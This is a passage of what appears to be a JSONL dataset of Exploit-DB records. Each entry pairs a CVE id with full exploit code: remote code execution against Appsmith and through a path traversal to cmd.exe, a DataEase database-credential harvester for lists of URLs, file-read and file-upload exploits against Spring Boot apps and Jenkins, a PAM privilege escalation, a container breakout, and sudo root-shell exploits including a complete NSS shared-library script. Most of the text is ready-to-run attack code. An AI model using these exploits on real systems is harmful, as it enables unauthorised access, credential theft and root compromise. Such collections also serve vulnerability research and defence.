text/xml\n\n\n\n performCommand\n \n \n\n../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n \n \n", "cve_id": "CVE-2024-32113", "source": "exploitdb", "timestamp": "2024-05-19T00:00:00+00:00"} {"id": "b26cb48c88a7025d534f", "text": "AppSmith 1.47 - Remote Code Execution (RCE)\n\n# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE)\n# Original Author: Rhino Security Labs\n# Exploit Author: Nishanth Anand\n# Exploit Date: April 2, 2025\n# Vendor Homepage: https://www.appsmith.com/\n# Software Link: https://github.com/appsmithorg/appsmith\n# Version: Prior to v1.52\n# Tested Versions: v1.47\n# CVE ID: CVE-2024-55963\n# Vulnerability Type: Remote Code Execution\n# Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution.\n# Proof of Concept: Yes\n# Categories: Web Application, Remote Code Execution, Database\n# CVSS Score: 9.8 (Critical)\n# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n# Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system.\n\nimport requests\nimport json\nimport pyfiglet\nimport argparse\n\n# Create a banner using pyfiglet\nbanner = pyfiglet.figlet_format(\"Appsmith RCE\") # Replace with your desired title\nprint(banner)\n\n# Set up argument parser\nparser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept')\nparser.add_argument('-u', '--url', required=True, help='Base URL of the target')\nparser.add_argument('command', nargs='?', default='id', help='Command to execute')\nargs = parser.parse_args()\n\n# Get the base URL and command from the parsed arguments\nbase_url = args.url\ncommand_arg = args.command\n\nif not base_url.startswith(\"http://\") and not base_url.startswith(\"https://\"):\n base_url = \"http://\" + base_url\n\n# Signup request\nsignup_url = f\"{base_url}/api/v1/users\"\nsignup_data = {\n \"email\": \"poc1@poc.com\",\n \"password\": \"Testing123!\"\n}\nprint('Signing up...')\nsignup_response = requests.post(signup_url, data=signup_data)\nsignup_response.raise_for_status()\n\n# Login request\nlogin_url = f\"{base_url}/api/v1/login\" # Adjust the URL as needed\nlogin_headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Origin\": base_url,\n \"Connection\": \"keep-alive\",\n \"Referer\": f\"{base_url}/user/login\",\n \"Cookie\": \"ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed\",\n}\n\nlogin_data = {\n \"username\": \"poc1@poc.com\", # Adjusted to match the provided request\n \"password\": \"Testing123!\"\n}\n\n# Make the login request without following redirects\nprint('Logging in...')\nlogin_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False)\nlogin_response.raise_for_status()\n\n# Capture the 'Set-Cookie' header if it exists\nset_cookie = login_response.headers.get('Set-Cookie')\nif set_cookie:\n # Split the Set-Cookie header to get the cookie name and value\n cookie_name, cookie_value = set_cookie.split(';')[0].split('=')\n\n# Fourth request to create a new workspace\nprint('Creating a new workspace...')\nif set_cookie:\n fourth_request_url = f\"{base_url}/api/v1/workspaces\"\n fourth_request_headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0\",\n \"Accept\": \"application/json, text/plain, */*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/json\",\n \"X-Requested-By\": \"Appsmith\",\n \"Connection\": \"keep-alive\",\n \"Referer\": f\"{base_url}/applications\",\n \"Cookie\": f\"{cookie_name}={cookie_value}\", # Use the captured session cookie\n }\n\n fourth_request_data = json.dumps({\"name\": \"Untitled workspace 3\"})\n fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data)\n fourth_response.raise_for_status()\n\n # Extract the 'id' from the response if it exists\n try:\n response_json = fourth_response.json()\n workspace_id = response_json.get(\"data\", {}).get(\"id\")\n except ValueError:\n print(\"Response content is not valid JSON:\", fourth_response.text) # Print the raw response for debugging\n\n if workspace_id:\n fifth_request_url = f\"{base_url}/api/v1/applications\"\n fifth_request_headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0\",\n \"Accept\": \"application/json, text/plain, */*\",\n ", "cve_id": "CVE-2024-55963", "source": "exploitdb", "timestamp": "2025-04-03T00:00:00+00:00"} {"id": "c09c750792c3bb501b61", "text": "DataEase 2.4.0 - Database Configuration Information Exposure\n\n# Exploit Title: DataEase 2.4.0 - Database Configuration Information Exposure\n# Shodan Dork: http.html:\"dataease\" #\n# FOFA Dork: body=\"dataease\" && title==\"DataEase\" #\n# Exploit Author: ByteHunter #\n# Email: 0xByteHunter@proton.me #\n# vulnerable Versions: 2.4.0-2.5.0 #\n# Tested on: 2.4.0 #\n# CVE : CVE-2024-30269 #\n############################ #\n################################################################\n\nimport argparse\nimport requests\nimport re\nimport json\nfrom tqdm import tqdm\n\ndef create_vulnerability_checker():\n vulnerable_count = 0\n\n def check_vulnerability(url):\n nonlocal vulnerable_count\n endpoint = \"/de2api/engine/getEngine;.js\"\n full_url = f\"{url}{endpoint}\"\n headers = {\n \"Host\": url.split('/')[2],\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US;q=0.9,en;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36\",\n \"Connection\": \"close\",\n \"Cache-Control\": \"max-age=0\"\n }\n\n try:\n response = requests.get(full_url, headers=headers, timeout=5)\n if response.status_code == 200:\n try:\n json_data = response.json()\n config = json_data.get(\"data\", {}).get(\"configuration\", None)\n\n if config:\n config_data = json.loads(config)\n\n username = config_data.get(\"username\")\n password = config_data.get(\"password\")\n port = config_data.get(\"port\")\n\n if username and password:\n vulnerable_count += 1\n print(f\"Vulnerable: {full_url}\")\n print(f\"Username: {username}\")\n print(f\"Password: {password}\")\n if port is not None:\n print(f\"Port Number: {port}\")\n\n except (json.JSONDecodeError, KeyError):\n print(f\"Invalid JSON response from {full_url}\")\n\n except requests.RequestException:\n pass\n\n return vulnerable_count\n\n return check_vulnerability\n\ndef main():\n parser = argparse.ArgumentParser(description=\"CVE-2024-30269 DataEase Database Creds Extractor\")\n parser.add_argument('-u', '--url', type=str, help='Single target')\n parser.add_argument('-l', '--list', type=str, help='URL File List')\n args = parser.parse_args()\n\n check_vulnerability = create_vulnerability_checker()\n\n if args.url:\n check_vulnerability(args.url)\n elif args.list:\n try:\n with open(args.list, 'r') as file:\n urls = [url.strip() for url in file.readlines() if url.strip()]\n total_urls = len(urls)\n for url in tqdm(urls, desc=\"Processing URLs\", unit=\"url\"):\n check_vulnerability(url)\n # tqdm.write(f\"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}\")\n except FileNotFoundError:\n print(f\"File not found: {args.list}\")\n else:\n print(\"provide a URL with -u or a file with -l.\")\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2024-30269", "source": "exploitdb", "timestamp": "2025-04-06T00:00:00+00:00"} {"id": "127d086c8cc8e1fd7a7b", "text": "Java-springboot-codebase 1.1 - Arbitrary File Read\n\n# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read\n# Google Dork:\n# Date: 23/May/2025\n# Exploit Author: d3sca\n# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase\n# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase\n# Version: [app version] 1.1\n# Tested on: Debian Linux\n# CVE : CVE-2025-46822\n\n#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd\n\nimport argparse\nimport requests\n\nfrom urllib.parse import quote\ndef exploit(target, file_path, output=None):\n # Ensure the file path is absolute\n if not file_path.startswith('/'):\n print(\"[!] Warning: File path is not absolute. Prepending '/' to make it absolute.\")\n file_path = '/' + file_path.lstrip('/')\n\n # URL-encode the file path\n encoded_path = quote(file_path, safe='')\n\n # Construct the target URL\n endpoint = f\"/api/v1/files/{encoded_path}\"\n url = target.rstrip('/') + endpoint\n print(f\"[*] Attempting to retrieve: {file_path}\")\n print(f\"[*] Sending request to: {url}\")\n try:\n response = requests.get(url, allow_redirects=False, timeout=10)\n\n if response.status_code == 200:\n print(\"[+] File retrieved successfully!\")\n if output:\n with open(output, 'wb') as f:\n f.write(response.content)\n print(f\"[+] Content saved to: {output}\")\n else:\n print(\"\\nFile contents:\")\n print(response.text)\n else:\n print(f\"[-] Failed to retrieve file. Status code: {response.status_code}\")\n print(f\"[-] Response: {response.text[:200]}\") # Show first 200 chars of response\n except Exception as e:\n print(f\"[-] An error occurred: {str(e)}\")\n\nif name == \"main\":\n parser = argparse.ArgumentParser(description=\"Exploit Path Traversal Vulnerability in Unauthenticated File API\")\n parser.add_argument(\"target\", help=\"Target base URL (e.g., http://victim:8080)\")\n parser.add_argument(\"file_path\", help=\"Absolute path to target file (e.g., /etc/passwd)\")\n parser.add_argument(\"-o\", \"--output\", help=\"Output file to save contents\")\n\n args = parser.parse_args()\n\n exploit(args.target, args.file_path, args.output)", "cve_id": "CVE-2025-46822", "source": "exploitdb", "timestamp": "2025-05-25T00:00:00+00:00"} {"id": "08e79720afbc5e3012a1", "text": "Jenkins 2.441 - Local File Inclusion\n\n# Exploit Title: Jenkins 2.441 - Local File Inclusion\n# Date: 14/04/2024\n# Exploit Author: Matisse Beckandt (Backendt)\n# Vendor Homepage: https://www.jenkins.io/\n# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip\n# Version: 2.441\n# Tested on: Debian 12 (Bookworm)\n# CVE: CVE-2024-23897\n\nfrom argparse import ArgumentParser\nfrom requests import Session, post, exceptions\nfrom threading import Thread\nfrom uuid import uuid4\nfrom time import sleep\nfrom re import findall\n\nclass Exploit(Thread):\n def __init__(self, url: str, identifier: str):\n Thread.__init__(self)\n self.daemon = True\n self.url = url\n self.params = {\"remoting\": \"false\"}\n self.identifier = identifier\n self.stop_thread = False\n self.listen = False\n\n def run(self):\n while not self.stop_thread:\n if self.listen:\n self.listen_and_print()\n\n def stop(self):\n self.stop_thread = True\n\n def receive_next_message(self):\n self.listen = True\n\n def wait_for_message(self):\n while self.listen:\n sleep(0.5)\n\n def print_formatted_output(self, output: str):\n if \"ERROR: No such file\" in output:\n print(\"File not found.\")\n elif \"ERROR: Failed to parse\" in output:\n print(\"Could not read file.\")\n\n expression = \"No such agent \\\"(.*)\\\" exists.\"\n results = findall(expression, output)\n print(\"\\n\".join(results))\n\n def listen_and_print(self):\n session = Session()\n headers = {\"Side\": \"download\", \"Session\": self.identifier}\n try:\n response = session.post(self.url, params=self.params, headers=headers)\n except (exceptions.ConnectTimeout, exceptions.ConnectionError):\n print(\"Could not connect to target to setup the listener.\")\n exit(1)\n\n self.print_formatted_output(response.text)\n self.listen = False\n\n def send_file_request(self, filepath: str):\n headers = {\"Side\": \"upload\", \"Session\": self.identifier}\n payload = get_payload(filepath)\n try:\n post(self.url, data=payload, params=self.params, headers=headers, timeout=4)\n except (exceptions.ConnectTimeout, exceptions.ConnectionError):\n print(\"Could not connect to the target to send the request.\")\n exit(1)\n\n def read_file(self, filepath: str):\n self.receive_next_message()\n sleep(0.1)\n self.send_file_request(filepath)\n self.wait_for_message()\n\ndef get_payload_message(operation_index: int, text: str) -> bytes:\n text_bytes = bytes(text, \"utf-8\")\n text_size = len(text_bytes)\n text_message = text_size.to_bytes(2) + text_bytes\n message_size = len(text_message)\n\n payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message\n return payload\n\ndef get_payload(filepath: str) -> bytes:\n arg_operation = 0\n start_operation = 3\n\n command = get_payload_message(arg_operation, \"connect-node\")\n poisoned_argument = get_payload_message(arg_operation, f\"@{filepath}\")\n\n payload = command + poisoned_argument + start_operation.to_bytes(1)\n return payload\n\ndef start_interactive_file_read(exploit: Exploit):\n print(\"Press Ctrl+C to exit\")\n while True:\n filepath = input(\"File to download:\\n> \")\n filepath = make_path_absolute(filepath)\n exploit.receive_next_message()\n\n try:\n exploit.read_file(filepath)\n except exceptions.ReadTimeout:\n print(\"Payload request timed out.\")\n\ndef make_path_absolute(filepath: str) -> str:\n if not filepath.startswith('/'):\n return f\"/proc/self/cwd/{filepath}\"\n return filepath\n\ndef format_target_url(url: str) -> str:\n if url.endswith('/'):\n url = url[:-1]\n return f\"{url}/cli\"\n\ndef get_arguments():\n parser = ArgumentParser(description=\"Local File Inclusion exploit for CVE-2024-23897\")\n parser.add_argument(\"-u\", \"--url\", required=True, help=\"The url of the vulnerable Jenkins service. Ex: http://helloworld.com/\")\n parser.add_argument(\"-p\", \"--path\", help=\"The absolute path of the file to download\")\n return parser.parse_args()\n\ndef main():\n args = get_arguments()\n url = format_target_url(args.url)\n filepath = args.path\n identifier = str(uuid4())\n\n exploit = Exploit(url, identifier)\n exploit.start()\n\n if filepath:\n filepath = make_path_absolute(filepath)\n exploit.read_file(filepath)\n exploit.stop()\n return\n\n try:\n start_interactive_file_read(exploit)\n except KeyboardInterrupt:\n pass\n print(\"\\nQuitting\")\n exploit.stop()\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2024-23897", "source": "exploitdb", "timestamp": "2024-04-15T00:00:00+00:00"} {"id": "18eeb89e53008d6b3ab5", "text": "Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)\n\n# Exploit Title: Unrestricted File Upload\n# Google Dork:\n# Date: 14/Nov/2024\n# Exploit Author: d3sca\n# Vendor Homepage:\nhttps://github.com/OsamaTaher/Java-springboot-codebase\n# Software Link:\nhttps://github.com/OsamaTaher/Java-springboot-codebase\n# Version: [app version] 0.1\n# Tested on: Debian Linux\n# CVE : CVE-2024-52302\n\n\n# Steps to Reproduce:\n\n# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html).\n\n# GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link.\n\n# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response.\n# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.\n\n\nimport requests\nimport argparse\nimport sys\n\n\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\ndef login(url, username, password):\n \"\"\"Authenticate with the API and return the Bearer token.\"\"\"\n login_endpoint = f\"{url}/api/v1/user/login\"\n headers = {\"Content-Type\": \"application/json\"}\n payload = {\n \"username\": username,\n \"password\": password\n }\n\n try:\n response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)\n response.raise_for_status()\n\n # Extract token\n token = response.json().get(\"token\")\n if not token:\n print(\"[!] Token not found in response. Exiting.\")\n sys.exit(1)\n\n print(\"[+] Authentication successful. Token acquired.\")\n return token\n except Exception as e:\n print(f\"[!] Login failed: {e}\")\n sys.exit(1)\n\ndef upload_file(url, token, file_path):\n \"\"\"Upload a file to the profile picture endpoint using the Bearer token.\"\"\"\n upload_endpoint = f\"{url}/api/v1/customer/profile-picture\"\n headers = {\n \"Authorization\": f\"Bearer {token}\"\n }\n files = {\n \"file\": open(file_path, \"rb\")\n }\n\n try:\n response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)\n response.raise_for_status()\n\n if response.status_code == 200:\n print(\"[+] File uploaded successfully.\")\n print(f\"[+] Response: {response.text}\")\n else:\n print(f\"[!] Failed to upload file. Status code: {response.status_code}\")\n print(f\"[!] Response: {response.text}\")\n except Exception as e:\n print(f\"[!] File upload failed: {e}\")\n sys.exit(1)\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Exploit script for unrestricted file upload vulnerability.\")\n parser.add_argument(\"-u\", \"--username\", required=True, help=\"Username for login\")\n parser.add_argument(\"-p\", \"--password\", required=True, help=\"Password for login\")\n parser.add_argument(\"-f\", \"--file\", required=True, help=\"File to upload\")\n parser.add_argument(\"-url\", \"--url\", required=True, help=\"Base URL of the target application (e.g., https://target.com)\")\n\n args = parser.parse_args()\n\n # Authenticate\n token = login(args.url, args.username, args.password)\n\n # Upload the file\n upload_file(args.url, token, args.file)\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2024-52302", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "9abaedb4709e78008ad0", "text": "Linux PAM Environment - Variable Injection Local Privilege Escalation\n\n# Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation\n# Exploit Author: @İbrahimsql\n# Exploit Author's github: https://github.com/ibrahmsql\n# Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment\n# leading to privilege escalation through SystemD session manipulation\n# CVE: CVE-2025-6018, CVE-2025-6019\n# Vendor Homepage: https://github.com/linux-pam/linux-pam\n# Software Link: https://github.com/linux-pam/linux-pam/releases\n# Version: PAM 1.3.0 - 1.6.0 (vulnerable versions)\n# Category: Local Privilege Escalation\n# Requirements: paramiko>=2.12.0\n# Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password\n# References:\n# - https://access.redhat.com/security/cve/CVE-2025-6018\n# - https://bugzilla.redhat.com/show_bug.cgi?id=2372693\n# - https://bugzilla.suse.com/show_bug.cgi?id=1243226\n\nimport paramiko\nimport time\nimport sys\nimport socket\nimport argparse\nimport logging\nfrom datetime import datetime\n\n# Setup logging\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s [%(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n handlers=[\n logging.FileHandler('cve_2025_6018_exploit.log'),\n logging.StreamHandler(sys.stdout)\n ]\n)\nlogger = logging.getLogger(__name__)\n\nclass CVEExploit:\n def __init__(self):\n self.vulnerable_versions = [\n \"pam-1.3.0\", \"pam-1.3.1\", \"pam-1.4.0\", \"pam-1.5.0\",\n \"pam-1.5.1\", \"pam-1.5.2\", \"pam-1.5.3\", \"pam-1.6.0\"\n ]\n\n def check_vulnerability(self, client):\n \"\"\"Enhanced vulnerability detection\"\"\"\n logger.info(\"Starting vulnerability assessment\")\n\n checks = {\n \"pam_version\": \"rpm -q pam || dpkg -l | grep libpam\",\n \"pam_env\": \"find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\\\; 2>/dev/null\",\n \"pam_systemd\": \"find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\\\; 2>/dev/null\",\n \"systemd_version\": \"systemctl --version | head -1\"\n }\n\n vulnerable = False\n\n for check_name, command in checks.items():\n logger.info(f\"Executing check: {check_name}\")\n try:\n stdin, stdout, stderr = client.exec_command(command, timeout=10)\n output = stdout.read().decode().strip()\n\n if check_name == \"pam_version\":\n for vuln_ver in self.vulnerable_versions:\n if vuln_ver in output:\n logger.info(f\"Vulnerable PAM version detected: {vuln_ver}\")\n vulnerable = True\n break\n\n elif check_name == \"pam_env\" and output:\n logger.info(\"pam_env.so configuration found\")\n vulnerable = True\n\n elif check_name == \"pam_systemd\" and output:\n logger.info(\"pam_systemd.so found - escalation vector available\")\n\n if output and check_name != \"pam_version\":\n logger.debug(f\"Command output: {output[:100]}...\")\n\n except Exception as e:\n logger.warning(f\"Check {check_name} failed: {e}\")\n\n time.sleep(0.5)\n\n return vulnerable\n\n def create_malicious_environment(self, client):\n \"\"\"Create enhanced .pam_environment file\"\"\"\n logger.info(\"Creating malicious environment file\")\n\n payload = '''# CVE-2025-6018 Environment Poisoning\nXDG_SEAT OVERRIDE=seat0\nXDG_VTNR OVERRIDE=1\nXDG_SESSION_TYPE OVERRIDE=x11\nXDG_SESSION_CLASS OVERRIDE=user\nXDG_RUNTIME_DIR OVERRIDE=/tmp/runtime\nSYSTEMD_LOG_LEVEL OVERRIDE=debug'''\n\n try:\n logger.info(\"Writing .pam_environment file\")\n cmd = f\"cat > ~/.pam_environment << 'EOF'\\n{payload}\\nEOF\"\n stdin, stdout, stderr = client.exec_command(cmd)\n\n # Verify creation\n stdin, stdout, stderr = client.exec_command(\"cat ~/.pam_environment\")\n output = stdout.read().decode()\n\n if \"OVERRIDE\" in output:\n logger.info(\"Malicious environment file created successfully\")\n return True\n else:\n logger.error(\"Failed to create environment file\")\n return False\n\n except Exception as e:\n logger.error(f\"Environment poisoning failed: {e}\")\n return False\n\n def test_privilege_escalation(self, client):\n \"\"\"Test privilege escalation vectors\"\"\"\n logger.info(\"Testing privilege escalation vectors\")\n\n tests = [\n (\"SystemD Reboot\", \"gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot\", \"yes\"),\n (\"SystemD Shutdown\", \"gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Man", "cve_id": "CVE-2025-6018", "source": "exploitdb", "timestamp": "2025-07-28T00:00:00+00:00"} {"id": "656bda65d2eeddb00d74", "text": "NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)\n\n# Exploit Title: Container Breakout with NVIDIA Container Toolkit\n# Date: 17/02/2025\n# Exploit Author: r0binak\n#Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit\n# Version: 1.16.1\n# Tested on: NVIDIA Container Tooklit 1.16.1\n# CVE: CVE-2024-0132\n\nDescription: NVIDIA Container Toolkit 1.16.1 or earlier contains a\nTime-of-check Time-of-Use (TOCTOU) vulnerability when used with\ndefault configuration where a specifically crafted container image may\ngain access to the host file system. This does not impact use cases\nwhere CDI is used. A successful exploit of this vulnerability may lead\nto code execution, denial of service, escalation of privileges,\ninformation disclosure, and data tampering.\n\nPoC link: https://github.com/r0binak/CVE-2024-0132\n\nSteps to Reproduce:\n\nBuild and run a docker image based on such a Dockerfile:\n\nFROM ubuntu\n\nRUN mkdir -p /usr/local/cuda/compat/\n\nRUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/\nRUN echo test >\n/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs\n\nRUN mkdir -p /pwn/libdxcore.so.1337/\nRUN ln -s ../../../../../../../../../\n/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs\n\nRUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1\n\nRUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs\n/usr/local/cuda/compat/libxxx.so.2\n\nThe host file system will reside in\n/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/\n\nRegards,\nSergey `*r0binak*` Kanibor", "cve_id": "CVE-2024-0132", "source": "exploitdb", "timestamp": "2025-03-26T00:00:00+00:00"} {"id": "15ba2c0721acbacf4af2", "text": "Sudo 1.9.17 Host Option - Elevation of Privilege\n\n# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege\n# Date: 2025-06-30\n# Exploit Author: Rich Mirch\n# Vendor Homepage: https://www.sudo.ws\n# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz\n# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32\n# Fixed in: 1.9.17p1\n# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any\n# Blog:\nhttps://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host\n# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo\n1.9.13p2\n# CVE : CVE-2025-32462\n#\nNo exploit is required. Executing a sudo or sudoedit command with the host\noption referencing an unrelated remote host rule causes Sudo to treat the\nrule as valid for the local system. As a result, any command allowed by the\nremote host rule can be executed on the local machine.\n\nExample /etc/sudoers file using the Host_Alias directive. The lowpriv user\nis allowed to execute all commands (full root) on dev.test.local,\nci.test.local, but not prod.test.local.\n\nHost_Alias SERVERS = prod.test.local, dev.test.local\nHost_Alias PROD = prod.test.local\nlowpriv SERVERS, !PROD = NOPASSWD:ALL\nlowpriv ci.test.local = NOPASSWD:ALL\n\nEven though the prod.test.local server is explicitly denied for the lowpriv\nuser, root access is achieved by specifying the host option for the\ndev.test.local or ci.test.local servers.\n\nExample\n\nShow that lowpriv is not allowed to execute sudo on the prod server.\n\nlowpriv@prod:~$ id\nuid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)\nlowpriv@prod:~$ sudo -l\n[sudo] password for lowpriv:\nSorry, user lowpriv may not run sudo on prod.\n\nList the host rules for the dev.test.local server.\n\nlowpriv@prod:~$ sudo -l -h dev.test.local\nMatching Defaults entries for lowpriv on dev:\n env_reset, mail_badpass,\nsecure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,\nuse_pty\n\nUser lowpriv may run the following commands on dev:\n (root) NOPASSWD: ALL\n\nExecute a root shell on prod.test.local by specifying the -h dev.test.local\noption.\n\nlowpriv@prod:~$ sudo -h dev.test.local -i\nsudo: a remote host may only be specified when listing privileges.\nroot@prod:~# id\nuid=0(root) gid=0(root) groups=0(root)", "cve_id": "CVE-2025-32462", "source": "exploitdb", "timestamp": "2025-07-08T00:00:00+00:00"} {"id": "cf7c16c0a6a9ba13102d", "text": "Sudo chroot 1.9.17 - Local Privilege Escalation\n\nExploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation\nGoogle Dork: not aplicable\nDate: Mon, 30 Jun 2025\nExploit Author: Stratascale\nVendor Homepage:https://salsa.debian.org/sudo-team/sudo\nSoftware Link:\nVersion: Sudo versions 1.9.14 to 1.9.17 inclusive\nTested on: Kali Rolling 2025-7-3\nCVE : CVE-2025-32463\n\n*Version running today in Kali:*\nhttps://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/\n\n*Background*\n\nAn attacker can leverage sudo's -R (--chroot) option to run\narbitrary commands as root, even if they are not listed in the\nsudoers file.\n\nSudo versions affected:\n\n Sudo versions 1.9.14 to 1.9.17 inclusive are affected.\n\nCVE ID:\n\n This vulnerability has been assigned CVE-2025-32463 in the\n Common Vulnerabilities and Exposures database.\n\nDetails:\n\n Sudo's -R (--chroot) option is intended to allow the user to\n run a command with a user-selected root directory if the sudoers\n file allows it. A change was made in sudo 1.9.14 to resolve\n paths via chroot() using the user-specified root directory while\n the sudoers file was still being evaluated. It is possible for\n an attacker to trick sudo into loading an arbitrary shared\n library by creating an /etc/nsswitch.conf file under the\n user-specified root directory.\n\n The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1\n and the chroot feature has been marked as deprecated. It will\n be removed entirely in a future sudo release. Because of the\n way sudo resolves commands, supporting a user-specified chroot\n directory is error-prone and this feature does not appear to\n be widely used.\n\n A more detailed description of the bug and its effects can be\n found in the Stratascale advisory:\n https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot\n\nImpact:\n\n On systems that support /etc/nsswitch.conf a user may be able\n to run arbitrary commands as root.\n\n*Exploit:*\n\n*Verify the sudo version running: sudo --versionIf is vulnerable, copy and\npaste the following code and run it.*\n*----------------------*\n#!/bin/bash\n# sudo-chwoot.sh – PoC CVE-2025-32463\nset -e\n\nSTAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)\ncd \"$STAGE\"\n\n# 1. NSS library\ncat > woot1337.c <<'EOF'\n#include \n#include \n\n__attribute__((constructor))\nvoid woot(void) {\n setreuid(0,0); /* change to UID 0 */\n setregid(0,0); /* change to GID 0 */\n chdir(\"/\"); /* exit from chroot */\n execl(\"/bin/bash\",\"/bin/bash\",NULL); /* root shell */\n}\nEOF\n\n# 2. Mini chroot with toxic nsswitch.conf\nmkdir -p woot/etc libnss_\necho \"passwd: /woot1337\" > woot/etc/nsswitch.conf\ncp /etc/group woot/etc # make getgrnam() not fail\n\n# 3. compile libnss_\ngcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c\n\necho \"[*] Running exploit…\"\nsudo -R woot woot # (-R )\n # • the first “woot” is chroot\n # • the second “woot” is and inexistent\ncommand\n # (only needs resolve the user)\n\nrm -rf \"$STAGE\"\n*----------------------*", "cve_id": "CVE-2025-32463", "source": "exploitdb", "timestamp": "2025-07-08T00:00:00+00:00"} {"id": "d21a4e55597d91ed2f9d", "text": "tar-fs 3.0.0 - Arbitrary File Write/Overwrite\n\n# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite\n# Date: 17th April, 2024\n# Exploit Author: Ardayfio Samuel Nii Aryee\n# Software link: https://github.com/mafintosh/tar-fs\n# Version: tar-fs 3.0.0\n# Tested on: Ubuntu\n# CVE: CVE-2024-12905\n\n\n# Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys\n# This will generate two tar file: stage_1.tar and stage_2.tar\n# Upload stage_1.tar first to unarchive the symlink\n# Next, upload stage_2.tar to 